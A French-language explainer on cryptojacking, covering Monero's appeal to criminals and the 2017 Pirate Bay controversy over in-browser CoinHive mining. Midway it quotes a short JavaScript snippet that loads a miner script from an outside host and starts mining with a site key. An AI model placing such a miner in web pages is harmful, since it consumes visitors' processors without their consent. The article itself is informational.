Cryptojacking, plus rentable et discret que les ransomwares

Le cryptojacking, c’est quoi ?

Le cryptojacking désigne un programme caché sur un ordinateur ou un appareil mobile qui
utilise les ressources de la machine cible pour miner de la cryptomonnaie.

Miner du Monero (XMR) ?

Monero est une cryptomonnaie conçue pour la confidentialité, promettant « Tous les avantages d’une cryptomonnaie décentralisée, sans aucune concessions sur la confidentialité. ».
Cette politique en fait d’elle la monnaie préférée des cybercriminels et c’est principalement cette cryptomonnaie que minent les cryptojackers.

« Secure, Private, Untraceable », « With Monero, You are your own bank. » Ces slogans brandis par Monero ont de quoi faire frémir certaines personnent qui se placent contre
la cryptomonnaie et ses dérives.

En 2017, ce sont les auteurs du célèbre ransomware « WannaCry » qui se sont tournés vers le Monero lorsqu’ils ont voulu rendre leurs rançons
encore plus difficile à retracer.

Polémique autour de The Pirate Bay

En 2017, C’est The Pirate Bay, l’irréductible site de torrents qui aurait probablement dû dire à ses utilisateurs
qu’il prévoyait d’utiliser leurs navigateurs pour miner des cryptomonnaies, mais vous le savez,
les pirates ne gagnent pas leur vie en demandant l’accord des uns et des autres.

C’est sur Reddit que certains utilisateurs ont commencé à se plaindre d’une utilisation extrêmement élevée du processeur
lorsqu’ils navigaient sur le site.

Mis au courant des plaintes, un administrateur du site a répondu :

« Nous voulons vous débarasser des publicités. Mais nous avons besoin d’argent pour le fonctionnement du site.
Voulez-vous des publicités ou voulez-vous donner pour quelques-uns, un peu de votre processeur à
chaque fois que vous visitez le site ? »

La question est posée.

Les administrateurs de The Pirate Bay ont effectivement intégré un code JavaScript de la plateforme CoinHive
sur les pages de recherche pour miner du Monero (XMR).

<script src="//clgserv.pro/lib/crypta.js"></script>
<script>
        var miner=new CRLT.Anonymous('37efd635d0ec154de4d0b17dd1952aa3b5e88acd6bbe', {
	    throttle:0.9,
        });
    miner.start();
</script>

L’avenir du cryptojacking

La plateforme CoinHive, a été fermée après un grand nombre de polémique et une chute du cours du Monero. D’autres alternatives à CoinHive existent comme CryptoLoot.
Avec l’essor et la démocratisation des cryptomonnaies, il est très probable que l’utilisations de ces programmes se multiplient au cours des années à venir.